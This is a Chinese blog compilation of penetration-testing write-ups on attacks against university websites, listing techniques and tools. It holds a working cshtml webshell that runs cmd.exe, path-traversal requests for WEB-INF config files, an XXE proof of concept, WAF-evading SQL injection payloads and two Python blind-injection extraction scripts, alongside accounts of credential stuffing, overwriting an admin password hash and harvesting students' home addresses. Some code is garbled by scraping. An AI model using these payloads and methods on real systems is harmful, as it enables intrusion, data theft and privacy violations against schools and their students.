大佬教程收集整理的这篇文章主要介绍了近期学习文章的整理（超级干货总结分享），大佬教程大佬觉得挺不错的，现在分享给大家，也给大家做个参考。

题记

    最近在edusrc上吃瓜，看大佬们互怼，又通过大佬们的名字发现个安全团队的博客，前有小口，仿佛若有光，大量的骚姿势文章让我获益无穷，相见恨晚，故脑中想法盛然，整理成博，总结文章，让我们在前方相遇。最近看到一个新手群的直播，可能是我的技术已经步入初级了，毫无营养，加油吧，少年们。

一、小小小月球大佬的分享

1.1 记一次和厂家相爱相杀

    文章地址：http://0dayhack.net/index.php/25/

    内容：http://xxxxx/index.html?userNo=xxxx链接可以直接登录后台，fofa收集站点，扫备份。黑盒测试发现接口。在接口处通过修改userid可以返回用户信息。通过把链接参数修改为管理员的实现进入管理员后台，在后台处发现ssrf，ssrf特征为http://xxxxxxx/api/imageRe?path=dnslog，厂家修复后再次测试，增加了登陆者身份关系校验，再次绕过，使用空值替换rm参数，形如userId=1&menuRole=SYS004&roleNo=SYS004&cal=381&rm=。

    总结：1、修改url参数可造成越权；2、后台留意ssrf与sql注入等漏洞；3、注意接口安全，有些情况可以删除参数绕过。

1.2 记一次文件上传绕过Error 500

    文章地址：@L_262_30@

    内容：首先在路边捡一个账号密码，登录后找敏感接口与上传点，发现只是前端检测，成功上传jsp但是java类无法编辑，其他语法可以解析，jsp联合html可以执行

    代码：

<%@ page language="java" contentType="text/html; charset=utf-8"

pageEncoding="utf-8" import="java.io.*"%>

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<Meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<title>Insert title here</title>

</head>

<body>

内容

</body>

</html>

    执行：.jsp?cmds=ipconfig

    总结：文件上传后无法解析可以思考下换种编码配合。

1.3 从零开始挖edusrc(一)

    文章地址：http://0dayhack.net/index.php/329/

    内容：(1)信息收集:资产收集，敏感信息收集，旁站C段收集，指纹收集，扫描的话推荐gody(指纹信息)加谷歌语法。(2)一个简单的逻辑漏洞，谷歌语法:site:域名 intext:登录|注册|找回密码|重置密码

    一个任意密码重置漏洞，注册2个用户，修改密码抓包，看到id后不要盲目改id，尝试登录另一个号抓包，对比区别测试。

    总结：活用信息收集，常见漏洞挖不到的话尝试逻辑漏洞，逻辑漏洞最后2个号测试，不要一上来就改，熟悉发包流程。

1.4 从零开始挖edusrc(二)-任意用户密码重置

    文章地址：http://0dayhack.net/index.php/361/

    内容：1、在测试逻辑的时候可以抓包上个操作的返回包进行对比，然后替换。比如你填写正确的验证码返回包是true，但现在你随便填写的验证码返回是false抓返回包吧false改成true，成功找回。

    2、把错误的返回包改成{}会返回正确，但是后端验证了pin码，把Pin码设置为空，直接跳过校验。检测验证码有可能是判断pin=xxxx，但=空之后else直接跳过了？不判断参数完整性进行绕过。

    总结：改响应包或者删除参数测试逻辑漏洞。

1.5 从零开始挖edusrc(三)-任意文件下载

    文章地址：http://0dayhack.net/index.php/383/

    内容：https://xxxxxxxxx/NECBSHistory/downloadFileByName?fileName=uploadNEFormAttachPictureWord_7290bb66-4c60-41fc-b701-4940b8560491.jsp&propertyName=uploadNEFormAttachPictureWord这种路径很可能存在任意文件下载，发现地址在上传文件的地方，上传完你可以下载，查看链接就是这个地址。

    下载测试：GET /NECBSHistory/downloadFileByName?filename=./../../../../WEB-INF/web.xml&propertyName=uploadNEFormConsignerDataWord与GET /NECBSHistory/downloadFileByName?filename=./../../../../WEB-INF/classes/config/applicationContext.xml&propertyName=uploadNEFormConsignerDataWord http/1.1

    总结：注意上传文件的地方，一不小心就发现个大家伙。

1.6 记一次某开BypassWAF–>GETSHelL

    文章地址：http://0dayhack.net/index.php/455/

    内容：首先测试账号登录，访问个人中心修改头像，先正常思路上传文件，上传文件会先返回一串加密后的值ticket，判断文件名是通过filename+ticket检测，然后就先上传websHell文件获得对应值，发现有安全狗，.html.aspx绕过安全狗，但是上传aspx不行，于是上传.html.ashx，记得免杀。

    总结：账号很重要，上传文件时候aspx不行可以尝试ashx。

1.7 浙大某站BypassWAF–>GETSHelL

    文章地址：http://0dayhack.net/index.php/646/

    内容：1.nodejs+java+ssh前后端分离上传，先上传图片得到jpg，改成jsp拦截，jspx不拦截但是访问地址报错（内容检测），2.绕过内容检测，jspx是以xml语法来书写jsp的文件，掏出jspx大宝贝一顿上传绕过方法jspx+垃圾字符绕过（在注释里填充大量垃圾字符可以绕过检测）。

    总结：java站尝试jspx的绕过，免杀方法：垃圾字符填充。

*1.8 某开的一次sql注入(bypassWAF)

    文章地址：http://0dayhack.net/index.php/735/

    内容：来自搜索框的sql注入，如果没waf，可以抓包加*,@L_249_25@map梭哈。这里有waf，手工测试，单引号报错，双引号正常，and 拦截，证明存在注入。大写+/**/绕过。

    总结：单引号双引号测是否有洞，get新姿势，以前我都是-0测的。

*1.9 一次简单的XXE漏洞挖掘

    文章地址：http://0dayhack.net/index.php/1008/

    内容：登录框，先测试弱口令，无果后发现xml传输，也返回xml。判断是否存在xml注入，先输入<root>报错，然后<root></root>，返回xml多半存在漏洞。

验证漏洞：

Poc

组成一个内部声明DTD，这里直接不需要声明xml

<!DOCTYPE root [

<!ENTITY % remote SYstem "file:///">

%remote;]>

dnslog

<!DOCTYPE root [

<!ENTITY % remote SYstem "dnslog">

%remote;]>

    总结：加深了我对XXE的理解。

1.10 记一次交大简单的getsHell(bypass)

    文章地址：http://0dayhack.net/index.php/1113/

    过程：进入后台（果然账号密码限制了我的想象力，大佬在路边随便都能捡到账号密码），找到上传点，百度搜索编辑器，后缀绕过：'ashx和ashx空格，都可绕过。内容检测：垃圾字符+马带走。

    总结：佛了，hacker就是hacker。

1.11 又又又是文件上传(base64上传)

    文章地址：http://0dayhack.net/index.php/1365/

    过程：找到头像上传点，先正常走一遍，发现base64上传。返回png文件，改成ashx发现返回ashx文件。把马转换成base64替换图片base64内容，执行成功。

    总结：原来还能这么干，图片转文件。

1.12 从零开始挖edusrc(四)-任意文件上传

    文章地址：http://0dayhack.net/index.php/1603/

    过程：上传文件直接拿sHell，翻翻目录，找到管理员后台与@L_350_153@myadmin，找配置文件发现账号密码，利用日志写入一句话木马，翻到管理员发现密码BCrypt加密，百度随便找个BCrypt加密替换上去(记得要保存管理员的，干完要还回去，毕竟只蹭蹭)$2a$10$2gP3nFQ3eajNzJayX2E5GuQJ@L_966_158@mIGXl4hWDKdXpeX9pQBUwGJW7m这是123456。进后台上传文件又getsHell，并不是头像上传接口了。

    总结：翻翻配置文件没准有惊喜，实在不行直接改密码进后台。

二、望海寺快下课

2.1 接口Fuzz的行为艺术

    文章地址：http://0dayhack.net/index.php/789/

    过程：1、前端源代码中发现一处js文件，login.js，其中夹杂着ajax的请求，其中有一处的checklogin的接口，传参的ID为stuID和schooldID还有Passwd，以此可见此处接口是进行身份验证，回应包里面同时还有data数据，那未授权访问后台概率性不大。同时会发现大部分行为验证都是在此接口进行验证，于是尝试遍历接口的目录，由于知道passwd是用来checklogin的接口使用，就删除其字段。只用stuID和schooldID。一下就跑出了一个getstudent的接口，同时并没有进行鉴权，导致任何用户发送指定的POST数据都可以获取其中数据，正好stuID和schooldID是刚开始大部分接口都有使用到的，也就跑出数据。谷歌语法收集学号会返回内容。知道了此接口，fofa搜索其他站点，用此接口获取其他学校的师生信息，登录就业网，发现其个人绝大部分的信息乃至家庭住址。此系统密码修改的地方还存在越权，虽然有cookie一些列的验证，但是都是用来进行接口的传参，并没有用来鉴权，直接修改目标学号就可以完成任意密码重置。2、请求一个anPhoneTrue的接口，传参值usMobile，返回的是json格式的success:error。直接字典一上跑接口 ，跑出了一个anAdminList*****的接口（账号的传参值直接用F12看登录框的html值），里面存在email，username和修改密码最重要的手机号码，当填入手机号的时候获取验证码尝试是否存在逻辑绕过的时候，居然发现 回应包里存在code，后续就是一样的操作找上传点，jsp免杀，有waf用<!– … –>来注释掉随便填充的垃圾数据导致waf检测不到。

    总结：记得注意接口，getstudent这个接口是利用bp以post传递固定参数，对目标目录下的文件进行字典爆破。

2.2 组合拳杀入教务系统

    文章地址：http://0dayhack.net/index.php/883/

    过程：登录框测试：sql万能密码，查看登录接口是否会返回敏感信息，逻辑绕过，弱口令。根据不同提示进行弱口令爆破，成功获得2个用户。@L_257_197@用的是asp.net 在所有文件上传处上了几个asp ashx的免杀马，都是无法解析。那就看看有没有其他类型的漏洞，点击编辑页面 寻思着能否发现其他关于教师的敏感信息，发现居然存在口令， 直接利用F12修改一下input中的type类型数值为text。又用管理员账号进行一些信息收集发现 默认密码的提示，同时在那个F12大法的地方，你会发现教师的默认密码为六个0。知道了这些信息，进行对其他系统的撞库（我们撞库肯定是利用一些测试用户，或者系统内置的用户）,FOFA大法。打开另一个站，存在验证码，发现拦掉不发送，就不会刷新。这边我们利用在上个系统中收集到类似内置用户和测试用户的账号，密码为六个0和默认密码进行爆破，成功爆破出一个宿舍用户。。

    总结：当一个站有成果或者有waf的时候，可以fofa找类似站点验证。

2.3 记Lower-GetSHell

    文章地址：http://0dayhack.net/index.php/1251/

    过程：摸到一个系统，发现存在sql，仅仅用了后端的一些关键字过滤，摸了一会儿发现可以，字节拼接+空格绕过+LIKE绕过。那个登录框直接上@L_249_25@map跑用一些tamper脚本可以跑出来，可以直接用Xp_cmdsHell。

三、AGONI

3.1 记一次对xxxedu的渗透测试

    文章地址：http://0dayhack.net/index.php/97/

    过程：爆破admin账户，弱口令无果，去注册界面，选择导师的时候出现测试用户名，测试用户登录，修改密码处id改为1越权变成管理员。测试未授权访问删除cookie，对比登录前后cookie，构造cookie成功以超管登录。

    总结：注册界面尝试寻找一些信息，多留意cookie的变化与构造。

3.2 记一次南开大学梅开三度

    文章地址：http://0dayhack.net/index.php/391/

    过程：发现南开某站点登陆界面可以枚举用户，且验证码拦截不会刷新。直接上burp枚举用户名，发现存在guest测试账户，且密码为123456 。成功登陆之后，权限为普通用户权限，测试了一波常见漏洞无果，发现上传居然强改后缀。既然在这里毫无进展，fofa搜索同类型站点。找到一个类似测试站点，直接爆破admin账户。发现存在弱口令，直接以admin账户登录，测试其余@L_772_249@点，发现其大部分系统@L_772_249@主要通过get传参，将get传参部分单独拉出来拼接至url链接中，可正常访问（这里需要登录后改链接访问）。越权添加用户，可以操作。

    总结：可先测试同类型网站，事半功倍。

3.3 看我如何通过黑盒测试日下四个证书站

    文章地址：http://0dayhack.net/index.php/756/

    过程：登录框，输入一个不存在的用户名，进行抓包测试。随意输入一个不存在的账户，登陆抓包单独拉出来简单测试一下sql 在用户名处加一个单引号，报错。存在waf，找一个无waf的站点跑payload。在登录的站点测试@L_772_249@抓包单独拉出来，删除cookie。访问，1、越权查看smtp服务器账户密码，2、查看所有账户，3、越权添加超管。这种意思就是在测试站抓包，修改域名什么的，造成直接修改目标域名的内容。

    总结：测试站点抓包修改请求，绕waf这方面不得不说冰蝎是真的好用啊，冰蝎不行那就脏字符+冰蝎，是真的秒啊。

3.4 记一次文件上传多重bypass

    文章地址：http://0dayhack.net/index.php/1076/

    过程：在某查询界面，随手一加单引号，报错，两个单引号闭合无报错信息，sql注入无疑。继续fuzz一遍，发现目标存在waf，输入一些关键字会被连接重置。不晓得是硬件还是云waf哦，如果是云waf的话可以通过查找真实ip进行运气绕过。例如我之前那个同济的站点就是通过查找真实IP地址进行绕过，另一种呢硬件waf的话，脏字节填充吧。fuzz一遍无果。既然到了这里，还是老规矩，先打其他没有waf的站点搞出payload，再去手动fuzz构造payload：发现可以通过%oa%ob替换空格达到绕过的效果最终payload：1′);–%0a%0b%01%03%04%05%06%07%08%09;%0b%01%03%04%05%06%07%08%09–%0a%0b%01%03%04%05%06%07%08%09Waitfor%0b%01%03%04%05%06%07%08%09–%0a%0b%01%03%04%05%06%07%08%09Delay%0b%01%03%04%05%06%07%08%09–%0a%0b%01%03%04%05%06%07%08%09'00:00:5'%0b%01%03%04%05%06%07%08%09–%0a%0b%01%03%04%05%06%07%08%09–hhhh（只适用于mssql，原理参考链接：http://cnblogs.com/willingtolove/p/11160605.html），进入子站后台，找到上传点，添加上传类型，但是aspx上传会过滤as，那我们就可以考虑一下aasspx 过滤拦截会过滤中间的as，之后会自动拼接a spx,形成aspx的后缀。但是waf站点不行，后思考aspx，net的站点应该是支持cshtml的马的，成功但是只能执行特定命令。

    代码：

@using System.CodeDom.Compiler;

@using System.Diagnostics;

@using System.Reflection;

@using System.Web.Compilation;

@functions {

String ExecuteCommand(String command, String arguments = null)

{

var output = new System.Text.StringBuilder();

var process = new Process();

var starTinfo = new ProcessStarTinfo

{

Filename = command,

Arguments = arguments,

WorkingDirectory = httpRuntime.AppDomainAppPath,

RedirectStandardOutput = true,

RedirectStandardError = true,

UseSHellExecute = false

};

process.StarTinfo = starTinfo;

process.OutputDataReceived += (sender, args) => output.AppendLine(args.Data);

process.ErrorDataReceived += (sender, args) => output.AppendLine(args.Data);

process.Start();

process.beginOutputReadLine();

process.beginErrorReadLine();

process.WaitForExit();

return output.ToString();

}

}

@{

var cmd = ExecuteCommand("cmd.exe", "/c whoami");

}

Output of the injected command (by Niemand):

@cmd

    总结：aspx.net站点尝试cshtml马。

四、其他

*4.1 简单的sql注入与脚本的编写与4.2 sql注入-BOOL盲注-一个小细节 作者：太空人

    文章地址：http://0dayhack.net/index.php/1630/与http://0dayhack.net/index.php/1724/

过程：第一篇：登录框测试注入点，通过报错知道是MysqL数据库，选择时间盲注。cc=1234&pwd=456'and if((length(database())=8),sleep(5),0))–+&key=，了解了原理之后就可以自己编写二分法脚本。第二篇：关注细节，有waf看返回正确与错误确定注入点，测试发现是mssql数据库，因为ban了 waitfor delay。又经过手工测试发现一些没被ban的函数1')and (ascii(subString('a',1,1))=97)--+正常payload 1')and (ascii(subString(({Content}),{i},1))-{miD})<1--+。

    脚本1：

# -*- coding:utf-8 -*-

 

import requests

from requests import exceptions

 

url = 'http://ip/checkUser'

 

def main():

result = ""

for i in range(1, 20):

low = 32

high = 128

while low < high:

@H_402_246@mid = int((low + high) / 2)

content = "SELEct user()"

sql = f"123'and if((ascii(substr(({Content}),{i},1))<{miD}),sleep(5),0))-- "

data = {

"cc":'123456',

"pwd": sql,

"key":''

}

headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0", "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-requested-With": "XMLhttprequest", "Origin": "http://ip", "Connection": "close", "Referer": "http://ip"}

r = requests.post(url=url, data=data,headers=headers)

if r.elapsed.@R_384_10586@l_seconds() > 5:

high = mid

else:

low = mid + 1

print("[+] After changing we got {} to {}".format(low, high))

if low == high == 32:

print("[*] Result is: {}".format(result))

break

print("[+] Now has {}".format(i))

result += chr(int((high + low - 1) / 2))

print("[*] Result Now is: {}".format(result))

 

if __name__ == '__main__':

@H_402_246@main()

    脚本2：

# -*- coding:utf-8 -*-

import requests

url = "ip:/???Text="

def main():

result = ""

for i in range(1, 200):

low = 31

high = 128

while low < high:

@H_402_246@mid = int((low + high) / 2)

content = "@@version"

sql = f"1')and (ascii(subString(({Content}),{i},1))-{miD})<1--+"

payload = url+sql

response = requests.get(url=payload)

if "共18条数据" in response.text:

high = mid

else:

low = mid + 1

print("[+] After changing we got {} to {}".format(low, high))

if low == high == 128 or low == high == 31:

print("[*] Result is: {}".format(result))

break

print("[+] Now has {}".format(i))

result += chr(int((high + low) / 2))

print("[*] Result Now is: {}".format(result))

if __name__ == '__main__':

@H_402_246@main()

    总结：脚本我还是看得懂的。

3.5 记一次目录遍历带来的惊喜

         文章地址：http://xz.aliyun.com/t/9418

         过程：浏览资源发现教育平台，首先尝试弱口令，弱口令无果后的思路，1、fofa同类型站点爆破出账户，尝试有没有未授权漏洞什么的。2、爆破用户名弱口令，获得权限后深入测试。

         观察返回包，发现不存在session等参数，这种大部分可以登录绕过，换站点用登录成功的账户密码替换返回包，成功绕过限制。账户权限小并且无敏感操作尝试上传测试，首先上传失败。拿御剑开始目录爆破，发现有目录遍历漏洞，发现上传测试页面，但是不返回文件路径，发现是Windows，在文件后缀添加禁止的字符，系统报错返回路径。然后研究命名规则，但是上传的目录不可读，尝试目录穿越，成功拿到sHell。

         总结：爆破有时候有奇效。

总结

    Get到各种新姿势，我说大佬们为啥都这么强，不说了，我去把我的通用漏洞整一波了。

大佬总结

以上是大佬教程为你收集整理的近期学习文章的整理（超级干货总结分享）全部内容，希望文章能够帮你解决近期学习文章的整理（超级干货总结分享）所遇到的程序开发问题。

如果觉得大佬教程网站内容还不错，欢迎将大佬教程推荐给程序员好友。

本图文内容来源于网友网络收集整理提供，作为学习参考使用，版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ：384754419，请注明来意。